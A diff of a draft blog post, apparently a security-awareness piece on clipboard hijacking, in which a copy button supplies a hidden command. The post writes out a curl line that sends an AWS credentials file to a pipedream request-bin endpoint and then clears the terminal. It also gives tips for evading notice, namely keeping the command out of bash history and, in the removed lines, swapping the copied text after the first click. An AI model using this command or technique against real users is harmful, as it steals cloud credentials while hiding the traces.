nickstanley574/nickstanley574.github.io/_drafts_public/2023-05-01-dont-trust-your-clipboard.md

 }
 </script>

-The copy button will copy the following command, but only on the first click.
-After the first click the real command will be copied.
+The copy button will copy the following command.

 {: .no-code-wrap}
 $  curl -s -d "$(cat ~/.aws/credentials-fake)" https://envbrzdr9hp9.x.pipedream.net/ > /dev/null; top -d 0.25 -c; clear;

-This is lower the chance of the end user noticing something is a miss.
-The ony indication that something is off is the terminal being cleared and the malous command is still copied to the clipboard.
-For a use to realize they have been compromised they would have to recognize the terminal clear being unusual before the copy something else to the clipboard.

 There are some subtleties to this commands that we should explore.

-Notice the space between the $ prompt and the command itself.
+Notice the space between the extra `$` prompt and the command itself.
 This will prevent the command from being saved to your bash history ([See HISTCONTROL](https://ss64.com/bash/history.html)).
-This means that the command will send the contents of the aws cred file to the RequestBin/pipedream endpoint, run the expect command, then clear terminal window, and nothing will be saved to the
+This means that the command will send the contents of the aws cred file to the RequestBin/pipedream endpoint, run the expect command, then clear terminal window, and nothing will be saved to the bash history.

 <div style="text-align: center;">
 <video style="max-width: 85%;"  controls>